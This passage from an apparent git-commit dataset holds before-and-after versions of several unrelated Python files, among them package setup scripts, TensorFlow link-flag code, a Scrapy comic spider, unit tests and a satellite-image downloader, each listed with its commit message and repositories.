# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=DATA_FILES,
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [],
},
)
|
mit
|
Python
|
|
72e907ade08aa92f2a816c7a1d6511d125204dbc
|
Update package description
|
erichonkanen/django-rest-framework-jwt,coUrbanize/django-rest-framework-jwt,chrisjones-brack3t/django-rest-framework-jwt,GetBlimp/django-rest-framework-jwt,ayarshabeer/django-rest-framework-jwt,vvangelovski/django-rest-framework-jwt,vforgione/django-rest-framework-jwt,blaklites/django-rest-framework-jwt,sandipbgt/django-rest-framework-jwt,kbussell/django-rest-framework-jwt,shanemgrey/django-rest-framework-jwt,orf/django-rest-framework-jwt,diegueus9/django-rest-framework-jwt,liyocee/django-rest-framework-jwt,plentific/django-rest-framework-jwt,oasiswork/django-rest-framework-jwt,ArabellaTech/django-rest-framework-jwt,ticosax/django-rest-framework-jwt,ajostergaard/django-rest-framework-jwt,1vank1n/django-rest-framework-jwt,skurtapp/django-rest-framework-jwt,soichih/django-rest-framework-jwt,KetsuN/django-rest-framework-jwt,icewater246/django-rest-framework-jwt,abdulhaq-e/django-rest-framework-jwt,TrackMaven/django-rest-framework-jwt
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
name = 'djangorestframework-jwt'
package = 'rest_framework_jwt'
description = 'JSON Web Token based authentication for Django REST framework'
url = 'https://github.com/GetBlimp/django-rest-framework-jwt'
author = 'Jose Padilla'
author_email = 'jpadilla@getblimp.com'
license = 'BSD'
install_requires = open('requirements.txt').read().split('\n')
test_suite = 'rest_framework_jwt.runtests.runtests.main'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
test_suite=test_suite,
install_requires=install_requires
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
name = 'djangorestframework-jwt'
package = 'rest_framework_jwt'
description = ''
url = 'https://github.com/GetBlimp/django-rest-framework-jwt'
author = 'Jose Padilla'
author_email = 'jpadilla@getblimp.com'
license = 'BSD'
install_requires = open('requirements.txt').read().split('\n')
test_suite = 'rest_framework_jwt.runtests.runtests.main'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
test_suite=test_suite,
install_requires=install_requires
)
|
mit
|
Python
|
4646873ec80076759c02deac7ff3c50665e31415
|
Update the PyPI version to 0.2.12
|
Doist/todoist-python,electronick1/todoist-python
|
setup.py
|
setup.py
|
# -*- coding: utf-8 -*-
import os
from setuptools import setup
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except:
return ''
setup(
name='todoist-python',
version='0.2.12',
packages=['todoist', 'todoist.managers'],
author='Doist Team',
author_email='info@todoist.com',
license='BSD',
description='todoist-python - The official Todoist Python API library',
long_description = read('README.md'),
install_requires=[
'requests',
],
# see here for complete list of classifiers
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=(
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
),
)
|
# -*- coding: utf-8 -*-
import os
from setuptools import setup
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except:
return ''
setup(
name='todoist-python',
version='0.2.11',
packages=['todoist', 'todoist.managers'],
author='Doist Team',
author_email='info@todoist.com',
license='BSD',
description='todoist-python - The official Todoist Python API library',
long_description = read('README.md'),
install_requires=[
'requests',
],
# see here for complete list of classifiers
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=(
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
),
)
|
mit
|
Python
|
7efc61175c540a56b03e829ec917ce9efc1f06f9
|
Fix incorrect get_link_flags on Mac
|
frreiss/tensorflow-fred,aldian/tensorflow,gautam1858/tensorflow,paolodedios/tensorflow,petewarden/tensorflow,petewarden/tensorflow,ppwwyyxx/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,gunan/tensorflow,chemelnucfin/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,ppwwyyxx/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,renyi533/tensorflow,arborh/tensorflow,aam-at/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,ppwwyyxx/tensorflow,chemelnucfin/tensorflow,tensorflow/tensorflow,arborh/tensorflow,annarev/tensorflow,jhseu/tensorflow,adit-chandra/tensorflow,Intel-tensorflow/tensorflow,ppwwyyxx/tensorflow,cxxgtxy/tensorflow,ppwwyyxx/tensorflow,renyi533/tensorflow,tensorflow/tensorflow,jhseu/tensorflow,paolodedios/tensorflow,arborh/tensorflow,annarev/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,jhseu/tensorflow,aam-at/tensorflow,Intel-Corporation/tensorflow,aldian/tensorflow,renyi533/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,DavidNorman/tensorflow,jhseu/tensorflow,DavidNorman/tensorflow,paolodedios/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,DavidNorman/tensorflow,davidzchen/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,xzturn/tensorflow,annarev/tensorflow,gautam1858/tensorflow,adit-chandra/tensorflow,cxxgtxy/tensorflow,xzturn/tensorflow,paolodedios/tensorflow,xzturn/tensorflow,paolodedios/tensorflow,sarvex/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,cxxgtxy/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,jhseu/tensorflow,Intel-Corporation/tensorflow,freedomtan/te
nsorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,sarvex/tensorflow,annarev/tensorflow,Intel-tensorflow/tensorflow,petewarden/tensorflow,gunan/tensorflow,annarev/tensorflow,chemelnucfin/tensorflow,davidzchen/tensorflow,xzturn/tensorflow,adit-chandra/tensorflow,tensorflow/tensorflow-pywrap_saved_model,chemelnucfin/tensorflow,freedomtan/tensorflow,sarvex/tensorflow,adit-chandra/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,annarev/tensorflow,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,xzturn/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,petewarden/tensorflow,davidzchen/tensorflow,xzturn/tensorflow,frreiss/tensorflow-fred,aldian/tensorflow,gunan/tensorflow,paolodedios/tensorflow,chemelnucfin/tensorflow,gautam1858/tensorflow,karllessard/tensorflow,aam-at/tensorflow,jhseu/tensorflow,tensorflow/tensorflow-pywrap_saved_model,annarev/tensorflow,chemelnucfin/tensorflow,tensorflow/tensorflow-pywrap_saved_model,annarev/tensorflow,DavidNorman/tensorflow,DavidNorman/tensorflow,petewarden/tensorflow,aam-at/tensorflow,xzturn/tensorflow,adit-chandra/tensorflow,ppwwyyxx/tensorflow,Intel-tensorflow/tensorflow,renyi533/tensorflow,freedomtan/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,gunan/tensorflow,gunan/tensorflow,frreiss/tensorflow-fred,aldian/tensorflow,adit-chandra/tensorflow,petewarden/tensorflow,tensorflow/tensorflow,Intel-Corporation/tensorflow,annarev/tensorflow,renyi533/tensorflow,davidzchen/tensorflow,frreiss/tensorflow-fred,gautam1858/tensorflow,chemelnucfin/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,adit-chandra/tensorflow,ppwwyyxx/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,chemelnucfin/tensorflow,yongtang/tensorflow,DavidNorman/tensorflow,arborh/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,cxxgtxy/tensorflow,davidzchen/tensorflow,frreiss/tensorflow-fred,gautam1858/tensorflow,annarev/tens
orflow,xzturn/tensorflow,renyi533/tensorflow,aam-at/tensorflow,renyi533/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,sarvex/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aldian/tensorflow,karllessard/tensorflow,karllessard/tensorflow,paolodedios/tensorflow,Intel-Corporation/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,DavidNorman/tensorflow,arborh/tensorflow,adit-chandra/tensorflow,davidzchen/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,ppwwyyxx/tensorflow,ppwwyyxx/tensorflow,karllessard/tensorflow,frreiss/tensorflow-fred,aam-at/tensorflow,gunan/tensorflow,sarvex/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,davidzchen/tensorflow,tensorflow/tensorflow-pywrap_saved_model,gunan/tensorflow,jhseu/tensorflow,annarev/tensorflow,chemelnucfin/tensorflow,davidzchen/tensorflow,karllessard/tensorflow,davidzchen/tensorflow,Intel-Corporation/tensorflow,xzturn/tensorflow,gunan/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,petewarden/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,xzturn/tensorflow,karllessard/tensorflow,davidzchen/tensorflow,Intel-Corporation/tensorflow,chemelnucfin/tensorflow,DavidNorman/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,aam-at/tensorflow,karllessard/tensorflow,jhseu/tensorflow,gautam1858/tensorflow,ppwwyyxx/tensorflow,aam-at/tensorflow,renyi533/tensorflow,gunan/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow,Intel-Corporation/tensorflow,freedomtan/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,frreiss/tensorflow-fred,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-exper
imental_link_static_libraries_once,gautam1858/tensorflow,Intel-Corporation/tensorflow,jhseu/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,renyi533/tensorflow,chemelnucfin/tensorflow,ppwwyyxx/tensorflow,yongtang/tensorflow,gautam1858/tensorflow,arborh/tensorflow,frreiss/tensorflow-fred,chemelnucfin/tensorflow,aldian/tensorflow,jhseu/tensorflow,cxxgtxy/tensorflow,arborh/tensorflow,aldian/tensorflow,xzturn/tensorflow,Intel-tensorflow/tensorflow,DavidNorman/tensorflow,sarvex/tensorflow,gautam1858/tensorflow,cxxgtxy/tensorflow,arborh/tensorflow,sarvex/tensorflow,Intel-tensorflow/tensorflow,aam-at/tensorflow,xzturn/tensorflow,freedomtan/tensorflow,frreiss/tensorflow-fred,arborh/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,renyi533/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,jhseu/tensorflow,sarvex/tensorflow,davidzchen/tensorflow,jhseu/tensorflow,yongtang/tensorflow,freedomtan/tensorflow,cxxgtxy/tensorflow,adit-chandra/tensorflow,arborh/tensorflow,yongtang/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,davidzchen/tensorflow,aldian/tensorflow,Intel-tensorflow/tensorflow,petewarden/tensorflow,cxxgtxy/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,Intel-tensorflow/tensorflow,karllessard/tensorflow,karllessard/tensorflow,yongtang/tensorflow,arborh/tensorflow,petewarden/tensorflow
|
tensorflow/python/platform/sysconfig.py
|
tensorflow/python/platform/sysconfig.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""System configuration library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as _os_path
import platform as _platform
from tensorflow.python.framework.versions import CXX11_ABI_FLAG as _CXX11_ABI_FLAG
from tensorflow.python.framework.versions import MONOLITHIC_BUILD as _MONOLITHIC_BUILD
from tensorflow.python.framework.versions import VERSION as _VERSION
from tensorflow.python.util.tf_export import tf_export
# pylint: disable=g-import-not-at-top
@tf_export('sysconfig.get_include')
def get_include():
"""Get the directory containing the TensorFlow C++ header files.
Returns:
The directory as string.
"""
# Import inside the function.
# sysconfig is imported from the tensorflow_core module, so having this
# import at the top would cause a circular import, resulting in
# the tensorflow_core module missing symbols that come after sysconfig.
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__), 'include')
@tf_export('sysconfig.get_lib')
def get_lib():
"""Get the directory containing the TensorFlow framework library.
Returns:
The directory as string.
"""
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__))
@tf_export('sysconfig.get_compile_flags')
def get_compile_flags():
"""Get the compilation flags for custom operators.
Returns:
The compilation flags.
"""
flags = []
flags.append('-I%s' % get_include())
flags.append('-D_GLIBCXX_USE_CXX11_ABI=%d' % _CXX11_ABI_FLAG)
return flags
@tf_export('sysconfig.get_link_flags')
def get_link_flags():
"""Get the link flags for custom operators.
Returns:
The link flags.
"""
is_mac = _platform.system() == 'Darwin'
ver = _VERSION.split('.')[0]
flags = []
if not _MONOLITHIC_BUILD:
flags.append('-L%s' % get_lib())
if is_mac:
flags.append('-ltensorflow_framework.%s' % ver)
else:
flags.append('-l:libtensorflow_framework.so.%s' % ver)
return flags
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""System configuration library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as _os_path
import platform as _platform
from tensorflow.python.framework.versions import CXX11_ABI_FLAG as _CXX11_ABI_FLAG
from tensorflow.python.framework.versions import MONOLITHIC_BUILD as _MONOLITHIC_BUILD
from tensorflow.python.framework.versions import VERSION as _VERSION
from tensorflow.python.util.tf_export import tf_export
# pylint: disable=g-import-not-at-top
@tf_export('sysconfig.get_include')
def get_include():
"""Get the directory containing the TensorFlow C++ header files.
Returns:
The directory as string.
"""
# Import inside the function.
# sysconfig is imported from the tensorflow_core module, so having this
# import at the top would cause a circular import, resulting in
# the tensorflow_core module missing symbols that come after sysconfig.
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__), 'include')
@tf_export('sysconfig.get_lib')
def get_lib():
"""Get the directory containing the TensorFlow framework library.
Returns:
The directory as string.
"""
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__))
@tf_export('sysconfig.get_compile_flags')
def get_compile_flags():
"""Get the compilation flags for custom operators.
Returns:
The compilation flags.
"""
flags = []
flags.append('-I%s' % get_include())
flags.append('-D_GLIBCXX_USE_CXX11_ABI=%d' % _CXX11_ABI_FLAG)
return flags
@tf_export('sysconfig.get_link_flags')
def get_link_flags():
"""Get the link flags for custom operators.
Returns:
The link flags.
"""
is_mac = _platform.system() == 'Darwin'
ver = _VERSION.split('.')[0]
flags = []
if not _MONOLITHIC_BUILD:
flags.append('-L%s' % get_lib())
if is_mac:
flags.append('-l:libtensorflow_framework.%s.dylib' % ver)
else:
flags.append('-l:libtensorflow_framework.so.%s' % ver)
return flags
|
apache-2.0
|
Python
|
14a96a82209f21ca468a4f765c514ffd68f30f31
|
add my little test script, 'cuz why not
|
kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1
|
plugins/python/test.py
|
plugins/python/test.py
|
#!/usr/bin/env python
#
# Copyright (C) 2005 David Trowbridge
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import BZFlag
print 'test'
BZFlag.SendTextMessage (0, 0, 'hello')
|
lgpl-2.1
|
Python
|
|
d22abe4ede958779a64c190bdd54451253eb2778
|
Add to model only if part of bunsen xxx
|
Iktwo/bunsen-scrapper
|
bunsenscrapper/spiders/bunsen.py
|
bunsenscrapper/spiders/bunsen.py
|
# -*- coding: utf-8 -*-
import scrapy
from bunsenscrapper.items import BunsenscrapperItem
from scrapy.http.request import Request
class BunsenSpider(scrapy.Spider):
name = "bunsen"
allowed_domains = ["bunsencomics.com"]
start_urls = (
'http://www.bunsencomics.com/?category=Bunsen+C%C3%B3mics',
)
def parse(self, response):
for sel in response.xpath('//article'):
item = BunsenscrapperItem()
item['title'] = sel.xpath('h1/a[contains(text(), "Bunsen")]/text()').extract()
item['link'] = sel.xpath('h1/a/@href').extract()
item['img'] = sel.css('.thumb-image').xpath('@data-src').extract()
isLinkGood = sel.xpath('h1/a/@href').re('bunsen-\d*$')
if isLinkGood and item['title']:
yield item
pass
next_link = response.xpath('//a[contains(text(), "Older")]/@href').extract()
if next_link:
yield Request('http://www.bunsencomics.com' + next_link[0], self.parse)
|
# -*- coding: utf-8 -*-
import scrapy
from bunsenscrapper.items import BunsenscrapperItem
from scrapy.http.request import Request
class BunsenSpider(scrapy.Spider):
name = "bunsen"
allowed_domains = ["bunsencomics.com"]
start_urls = (
'http://www.bunsencomics.com/?category=Bunsen+C%C3%B3mics',
)
def parse(self, response):
for sel in response.xpath('//article'):
item = BunsenscrapperItem()
item['title'] = sel.xpath('h1/a/text()').extract()
item['link'] = sel.xpath('h1/a/@href').extract()
item['img'] = sel.css('.thumb-image').xpath('@data-src').extract()
yield item
pass
next_link = response.xpath('//a[contains(text(), "Older")]/@href').extract()
if next_link:
yield Request('http://www.bunsencomics.com' + next_link[0], self.parse)
|
unlicense
|
Python
|
23df7b77cde8b5351cf2902b8b11ee07e4b478f4
|
Add a basic smoke test to check for exceptions and programming errors.
|
BitokuOokami/PloungeMafiaToolkit
|
tests/smoke_test.py
|
tests/smoke_test.py
|
# -*- coding: utf-8 -*-
import unittest
import sys
sys.path.insert(0, '../mafia')
from game import Game
from game import Player
class TestMessenger:
def message_all_players(self, message: str):
print ('public: {message}'.format(message=message))
def message_player(self, player, message: str):
print ('{name}: {message}'.format(name=player.nickname, message=message))
class SmokeTest(unittest.TestCase):
def setUp(self):
self.messenger = TestMessenger()
def test_smoke_test(self):
game = Game('t,c,c,m', self.messenger)
player_one = Player('one', 'one')
player_two = Player('two', 'two')
player_three = Player('three', 'three')
player_four = Player('four', 'four')
game.join(player_one)
game.join(player_two)
game.join(player_three)
game.join(player_four)
game.vote('one', 'three')
game.vote('three', 'one')
game.vote('two', 'three')
game.vote('four', 'three')
game.target('one', 'two')
game.target('two', 'one')
game.target('four', 'one')
print(game.actions)
if __name__ == '__main__':
unittest.main()
|
mit
|
Python
|
|
a1f1efe712205b3bd4702a7ae3d06aa3171ad32f
|
add missing file...
|
chubbymaggie/angr,schieb/angr,axt/angr,axt/angr,angr/angr,tyb0807/angr,iamahuman/angr,iamahuman/angr,axt/angr,chubbymaggie/angr,chubbymaggie/simuvex,f-prettyland/angr,schieb/angr,tyb0807/angr,tyb0807/angr,angr/simuvex,chubbymaggie/angr,chubbymaggie/simuvex,f-prettyland/angr,chubbymaggie/simuvex,iamahuman/angr,schieb/angr,angr/angr,angr/angr,f-prettyland/angr
|
simuvex/plugins/uc_manager.py
|
simuvex/plugins/uc_manager.py
|
import logging
l = logging.getLogger('simuvex.plugins.uc_manager')
from .plugin import SimStatePlugin
class SimUCManager(SimStatePlugin):
def __init__(self, man=None):
SimStatePlugin.__init__(self)
if man:
self._uc_region_base = man._uc_region_base
self._uc_pos = man._uc_pos
else:
self._uc_region_base = 0xd0000000
self._uc_pos = 0
def assign(self):
"""
Assign a new region for under-constrained symbolic execution
:return: as ast of memory address that points to a new region
"""
ptr = self.state.se.BVV(self._uc_region_base + self._uc_pos, self.state.arch.bits)
self._uc_pos += 0x1000
return ptr
def copy(self):
return SimUCManager(man=self)
SimStatePlugin.register_default('uc_manager', SimUCManager)
|
bsd-2-clause
|
Python
|
|
e33ce5f613c2a7bb9c2c42fba695ee37d3bb66ce
|
Add integration tests
|
PoprostuRonin/memes-api
|
tests/test_flask.py
|
tests/test_flask.py
|
from main import app
import pytest
import json
@pytest.fixture
def client():
client = app.test_client()
yield client
sites = [
"/kwejk",
"/jbzd",
"/9gag",
"/9gagnsfw",
"/demotywatory",
"/mistrzowie",
"/anonimowe",
]
# This test could fail if the site changes it's schema or is not functional
@pytest.mark.parametrize("site", sites)
def test_sites(client, site):
r = client.get(site)
assert r.status == "200 OK"
data = json.loads(r.data)
assert len(data["memes"]) > 0
assert data["next_page_url"] is not None
r = client.get(data["next_page_url"])
assert r.status == "200 OK"
data = json.loads(r.data)
assert len(data["memes"]) > 0
assert data["next_page_url"] is not None
|
mit
|
Python
|
|
36a85fac06fd1bfe6934883f98b60edcbf3814be
|
Add test for scuba.utils.format_cmdline()
|
JonathonReinhart/scuba,JonathonReinhart/scuba,JonathonReinhart/scuba
|
tests/test_utils.py
|
tests/test_utils.py
|
from __future__ import print_function
from nose.tools import *
from unittest import TestCase
import logging
import shlex
from itertools import chain
from .utils import *
import scuba.utils
class TestUtils(TestCase):
def _parse_cmdline(self, cmdline):
# Strip the formatting and whitespace
lines = [l.rstrip('\\').strip() for l in cmdline.splitlines()]
# Split each line, and return a flattened list of arguments
return chain.from_iterable(map(shlex.split, lines))
def _test_format_cmdline(self, args):
# Call the unit-under-test to get the formatted command line
result = scuba.utils.format_cmdline(args)
# Parse the result back out to a list of arguments
out_args = self._parse_cmdline(result)
# Verify that they match
assert_seq_equal(out_args, args)
def test_basic(self):
'''format_cmdline works as expected'''
self._test_format_cmdline([
'something',
'-a',
'-b',
'--long', 'option text',
'-s', 'hort',
'a very long argument here that will end up on its own line because it is so wide and nothing else will fit at the default width',
'and now',
'some', 'more', 'stuff',
'and even more stuff',
])
|
mit
|
Python
|
|
424db0df3c8be8538d551bd6974a8eccee6e53cc
|
add tenki.py
|
mii012345/deep-learning
|
tenki.py
|
tenki.py
|
import urllib.request
import sys
import numpy as np
url="http://weather.is.kochi-u.ac.jp/sat/gms.fareast/"
a=1
b=0
x = input("Please Enter Year You Want: ")
y = input("And Enter Folder You Save File: ") + "/"
c=[]
for ii in range(1,13):
for i in range(1,32):
if i<10:
url="http://weather.is.kochi-u.ac.jp/sat/gms.fareast/"+x+"/0"+str(a)+"/0"+str(i)+"/fe."+x[2:]+"0"+str(a)+"0"+str(i)+"09.jpg"
title=y+str(b)+".jpg"
else:
url="http://weather.is.kochi-u.ac.jp/sat/gms.fareast/"+x+"/0"+str(a)+"/"+str(i)+"/fe."+x[2:]+"0"+str(a)+str(i)+"09.jpg"
title=y+str(b)+".jpg"
try:
urllib.request.urlretrieve(url,title)
except:
if ii == 2:
if i == 29:
ii+=1
continue
if ii == 4 or ii == 6 or ii == 9 or ii == 11:
if i == 31:
ii+=1
continue
d = str(ii)+"/"+str(i)
c = np.append(c,[d],axis=0)
continue
print(b,url)
b+=1
a+=1
print("I Was Able To Download Files About "+str(x))
print("This Is Files I Could Not Download:")
for i in c:
print(i)
|
mit
|
Python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.